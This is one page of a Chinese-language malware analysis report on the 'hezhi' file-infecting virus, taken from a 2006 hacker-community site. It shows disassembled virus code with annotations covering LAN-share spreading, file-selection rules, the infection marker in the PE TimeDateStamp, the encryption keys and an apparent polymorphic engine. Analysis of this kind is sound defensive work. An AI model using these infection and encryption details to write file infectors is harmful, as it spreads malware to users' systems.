 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| hezhi病毒分析报告 | |||||
作者:未知 文章来源:黑客动画吧 点击数: 更新时间:2006-3-18  |
|||||
|
001365A4 8B03 MOV EAX,DWORD PTR DS:[EBX] 001365A6 66:8EDA MOV DS,DX 001365A9 8B20 MOV ESP,DWORD PTR DS:[EAX] 001365AB 33DB XOR EBX,EBX 001365AD 66:8CDA MOV DX,DS 8.枚举局域网共享资源,并感染之 9.查找C-Z的固定磁盘, a.其中包含:RUNDLL32\RUNONCE\RAV\LSASS\SERVICES\WINLOGON\SPOOLSV MSTASK\RPCSS\AVCONSOL字符串的文件不感染. b.小于8K的文件不感染. c.系统目录下的文件不感染. 10当找到一个EXE文件时,首先判断是否是合法的PE文件,然生判断是否是已经感染文件 (以PE文件结构中的TimeDateStamp+1处的两个字节是否等于C354H来判断),如果 等于则继续下一个文件.否则转11 11.具体的感染过程如下:(由于是在最后一次解密后DUMP出来的,所以地址跟OD中的不一样 但指令和代码功能是一样的) 另:加密病毒代码和原宿主程序代码的Key由原宿主程序TimeDateStamp算得 00412A60 66:837E 5C 02 CMP WORD PTR DS:[ESI+5C],2 \\WINDOWS系统 00412A65 0F85 7F040000 JNZ CLSPACK.00412EEA 00412A6B 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8] \\TimeDateStamp 00412A6E 83F8 00 CMP EAX,0 00412A71 75 21 JNZ SHORT CLSPACK.00412A94 \\在TimeDataStamp不为0的情况下用它用密钥,否则用E4C3542D为密钥 00412A73 B8 2D54C3E4 MOV EAX,E4C3542D \\密钥呀 E4C3542D 00412A78 C787 7F100000 CA>MOV DWORD PTR DS:[EDI+107F],2ACA 00412A82 C787 85100000 7C>MOV DWORD PTR DS:[EDI+1085],67C 00412A8C 8946 08 MOV DWORD PTR DS:[ESI+8],EAX 00412A8F E9 C3000000 JMP CLSPACK.00412B57 00412A94 8987 AA300000 MOV DWORD PTR DS:[EDI+30AA],EAX \\下面这段关键呀 00412A9A 50 PUSH EAX 00412A9B 53 PUSH EBX 00412A9C 35 DF6A45D3 XOR EAX,D3456ADF \\D3456ADF 00412AA1 8987 4A100000 MOV DWORD PTR DS:[EDI+104A],EAX 00412AA7 BB FFFAFFFF MOV EBX,-501 00412AAC 2BD8 SUB EBX,EAX 00412AAE 899F 50100000 MOV DWORD PTR DS:[EDI+1050],EBX 00412AB4 5B POP EBX 00412AB5 58 POP EAX 00412AB6 53 PUSH EBX 00412AB7 51 PUSH ECX 00412AB8 E8 FB060000 CALL CLSPACK.004131B8 \\\(TimeDateStamp*0x7FFFFFFF+1)%-5=EAX 其中TimeDataStamp为EAX 00412ABD 8BD8 MOV EBX,EAX 00412ABF C1EB 08 SHR EBX,8 00412AC2 50 PUSH EAX 00412AC3 53 PUSH EBX 00412AC4 51 PUSH ECX 00412AC5 52 PUSH EDX 00412AC6 8BC3 MOV EAX,EBX 00412AC8 8BCB MOV ECX,EBX 00412ACA 25 FF000000 AND EAX,0FF 00412ACF 50 PUSH EAX \\这段代码应该是变形引擎的随机数选择段 00412AD0 C1E8 04 SHR EAX,4 00412AD3 24 07 AND AL,7 00412AD5 3C 05 CMP AL,5 00412AD7 76 02 JBE SHORT CLSPACK.00412ADB 00412AD9 2C 02 SUB AL,2 00412ADB 8AD8 MOV BL,AL 00412ADD 58 POP EAX 00412ADE 24 07 AND AL,7 00412AE0 3C 05 CMP AL,5 00412AE2 76 02 JBE SHORT CLSPACK.00412AE6 00412AE4 2C 04 SUB AL,4 00412AE6 38D8 CMP AL,BL 00412AE8 75 34 JNZ SHORT CLSPACK.00412B1E 00412AEA 8BD9 MOV EBX,ECX 00412AEC C1EB 08 SHR EBX,8 00412AEF 8BC3 MOV EAX,EBX 00412AF1 25 FF000000 AND EAX,0FF 00412AF6 50 PUSH EAX 00412AF7 C1E8 04 SHR EAX,4 00412AFA 24 07 AND AL,7 00412AFC 3C 05 CMP AL,5 00412AFE 76 02 JBE SHORT CLSPACK.00412B02 00412B00 2C 02 SUB AL,2 00412B02 8AD8 MOV BL,AL 00412B04 58 POP EAX 00412B05 24 07 AND AL,7 00412B07 3C 05 CMP AL,5 00412B09 76 02 JBE SHORT CLSPACK.00412B0D 00412B0B 2C 04 SUB AL,4 00412B0D 38D8 CMP AL,BL 00412B0F 75 0D &, nbsp; JNZ 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
